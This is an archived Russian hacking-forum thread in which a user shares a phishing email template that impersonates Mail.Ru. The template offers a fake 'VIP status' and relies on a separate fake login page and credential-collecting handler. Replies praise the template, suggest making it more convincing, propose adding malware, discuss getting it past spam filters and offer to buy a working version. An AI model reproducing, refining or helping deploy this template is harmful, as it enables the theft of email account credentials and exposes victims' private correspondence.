PDA

Просмотр полной версии : Mail.Ru в теле письма

insert294
07.08.2012, 01:00
Всем привет, вот решил создать фейк майла в теле письма. Это моя вторая работа и хотелось бы чтобы вы юзеры, хакеры и нубы оценили его). Опробовать я его еще не успел и поэтому об эффективности этого творения не могу ни че сказать. Писал все сам, но часть кода пришлось вырвать из какого то фейка, автор того фейка спасибо =). Прошу указать на ошибки чтобы в следующий раз их не повторить. Для того чтобы им пользоваться вам нужен еще один фейк, самой страницы с формой входа, вот на этой странице и указывайте свой обработчик. А путь до вашего фейка указывайте в теле письма.. т.е в кнопках или где вам вздумается
вот как сие чудо выглядит в ящике майла.
IMAGE (https://hpc.name/redirector.html#http://images.vfl.ru/ii/1344340707/f7b2f76c/795337_m.jpg) http://images.vfl.ru/ii/1344340707/f7b2f76c/795337_m.jpg

HTML highlight

VIP подарок

Уважаемый пользователь, поздравляем Вас! Сервис Mail.ru выбрал Вас в качестве активного пользователя сети и дарит Вам

VIP

статус на 30 дней. Имея

VIP

статус вы можете:

Отправлять

VIP

подарки

Подарить

VIP

другу

Вы получаете скидку на пополнение "Мэйликов"

И многое другое!

Подтвердить VIP

Отказаться

Уважаемый пользователь, убeдительная просьба подтвердить

VIP

или отказаться.

Что еще есть на

Mail.Ru

Общайтесь, развлекайтесь и

узнавайте новое каждый день. Вам не

нужно регистрироваться на

всех сервисах Mail.Ru отдельно.

Мой Мир

Общайтесь с

друзьями, играйте, делитесь фотографиями и

слушайте любимую музыку.

Агент Mail.Ru

Уведомления о

новых письмах, голосовые и

видеозвонки, бесплатные SMS, поддержка ICQ.

Игры

Играйте в бесплатные онлайн-игры вместе с друзьями или новыми знакомыми.

Деньги

Оплачивайте покупки в

интернет-магазинах, мобильную связь, коммунальные услуги, интернет без

комиссии.

Поиск

Ищите в

интернете все, что

угодно: информацию, картинки, видео, товары и

другое.

Видео

Большая коллекция видеоклипов, кино, сериалов, мультфильмов для

детей и

взрослых, юмор и

многое другое.

Новости

Оперативно получайте полную картину российских и

мировых событий.

Карты

Пользуйтесь детальными картами городов России. Смотрите пробки, изучайте мир.

Авто

Читайте автомобильные новости, купите или

продайте автомобиль, знакомьтесь с

новинками (тест-драйвы).

Работа

Ищите работу и

сотрудников в

крупнейшем банке вакансий.

И

многое другое!

Все сервисы Mail.Ru

.

Если нужна помощь от Mail.Ru

Мы всегда готовы помочь! Вы можете воспользоваться разделом «

Помощь

» или

написать в

«

Службу поддержки

».

обработчик уже заезженный и его найти не составит труда, но все же..

PHP highlight

";
?>

Andorfin
Молодчина!)

Kiebling
Отлично! Молодец!
У меня к тебе просьба, можешь лого самое первое, вверху которое, где написано @Mail.ru, цвет этой полоски сделать как у Mail.ru сейчас.

Kiebling
08.08.2012, 01:00
Цитата:

Сообщение от insert294

спасибо). вообще то она такого же цвета. прошу подстраиваем его под себя, кому что не нравятся просто отписывать в теме, но без просьб что то исправить в нем.

Ты попробовал его в деле? Люди доверяют ему?

Если есть желание, может вдвоем сделать фейк для Mail.ru, только концепция будет другая.

piopi21
стрёмно выглядит vip натпись на картинке красочнее должна быть и ещё нужно чтоб авторизация была в самом письме и предлогала скачать вируссный софт : и ещё лиди не открывают спам на мыле

insert294
Цитата:

Сообщение от piopi21

стрёмно выглядит vip натпись на картинке красочнее должна быть и ещё нужно чтоб авторизация была в самом письме и предлогала скачать вируссный софт : и ещё лиди не открывают спам на мыле

1) письмо идет не в спам, а во входящие
2) авторизация в самом письме это уже как то подозрительно имхо.
3) про надпись, спасибо учту
4) для вирусного софта нужны хорошие крипторы, а таких я не имею

Kiebling
Цитата:

Сообщение от piopi21

Про ВИП надпись согласен. insert, держи картинку для ВИП, они такую обычно используют.

Окно авторизации не нужно!

И еще, вот где "Что еще есть на Mail.ru", у тебя иконки сервисов получились очень уж, как бы сказать, тесные, немного сжатые, если так можно сказать.
Думаю, надпись с подчеркиванием лучше изменить на такое: Вы можете отказаться от VIP cтатуса, нажав на "Отказаться" или проигнорировав данное письмо.
Сегодня кое-что попробую изменить, скриншот пришлю.

insert294
Цитата:

Сообщение от Kiebling

Отлично! Молодец!
У меня к тебе просьба, можешь лого самое первое, вверху которое, где написано @Mail.ru, цвет этой полоски сделать как у Mail.ru сейчас.

спасибо). вообще то она такого же цвета. прошу подстраиваем его под себя, кому что не нравятся просто отписывать в теме, но без просьб что то исправить в нем.

Gelena
12.08.2012, 01:00
Простите,но специлаьно зарегистрировалась сказать,что вы придурки.Какой вам толк от того,что вы разводите людей?Ну поведется кто-то,понадеявшись на халяву.Но вы не задумывались,что у людей хранятся личные письма,что это "интимная" зона чужого вам человека. Если у вас такой творческий потенциал,то развивали бы его в нужно русле,а не страдали бы херней,называя это работой.

Andorfin
13.08.2012, 01:00
Цитата:

Сообщение от Gelena

Простите,но специлаьно зарегистрировалась сказать,что вы придурки.Какой вам толк от того,что вы разводите людей?Ну поведется кто-то,понадеявшись на халяву.Но вы не задумывались,что у людей хранятся личные письма,что это "интимная" зона чужого вам человека. Если у вас такой творческий потенциал,то развивали бы его в нужно русле,а не страдали бы херней,называя это работой.

Подсталом!Жги дальше

de.p0is0n
Цитата:

Сообщение от Gelena

Здравствуйте уважаемая! Какой нам толк? Тут есть люди которые зарабатывают себе на хлеб и воду этим делом, это основная причина.

Andorfin
Цитата:

Сообщение от Gelena

Простите,но специлаьно зарегистрировалась сказать,что вы придурки.

Хамим и нарушаем правила!

Напиши почту,я скину фотку свою

insert294
хех..197 просмотров и всего 11 ответов..ребят, отписывались хотя бы, если уж пользуетесь

evg21245
14.08.2012, 01:00
Цитата:

Сообщение от Gelena

Специально для придурошной!Это хак-форум ,тут люди сидят для того что бы обучиться взламывать как раз ваши интимные письма или для работы по взломам.Если человек лох то пусть разводиться!А если у тебя творческий потенциал не по этой теме то дергай отсюда пока ветер без сучков.

Nikodim
21.10.2012, 01:00
Менял текст,хост,но не приходит..Подскажите где редактировать плиз,сам не шарю,а ТС забанен.

noizZzefan
Оффтоп:
Кстати, а почему ТС забанен?(Жалко немного ) Вроде дружелюбный, вряд ли просто так обидет...

Очень красивый фейк, спасибо автору.

Nikodim
Ребята,может кто-нить ответить на вопрос кроме флуда..?

zelim67
22.10.2012, 01:00
Nikodim: давай в скайп zelim6767 помогу

Yorvet
Вот что за мода пошла на "скайпы"? Чуть что, зовут в скайп, аську или ещё куда. А слабо прямо здесь написать что фильтруется фейк?

zelim67
Yorvet: Свободен.. к вам не кто не обращался

Nikodim
23.10.2012, 01:00
Цитата:

Сообщение от zelim67

Nikodim: давай в скайп zelim6767 помогу

Балабол!!!На сайте игнорируешь и в скайпе!!!

Nikodim
Люди,помогите разобраться,какую часть они блочат?

Dmitry777
Помогите пожалуйста как пользоваться мой скайп D.i.m.a.n.97 на хостингах зареган а что дальше я не знаю!

Nick Hander
Цитата:

Люди,помогите разобраться,какую часть они блочат?

Обнаруживается как правило экспериментальным путем

Yorvet
zelim67, к тебе не обращались тоже, так что спесь то поубавь.

Никто не скажет тебе что именно фильтруется. Проверяй сам. Не хочешь сам - плати и тебе проверят.

Nikodim
30.10.2012, 01:00
Куплю этот фейк рабочий,чтобы доходил.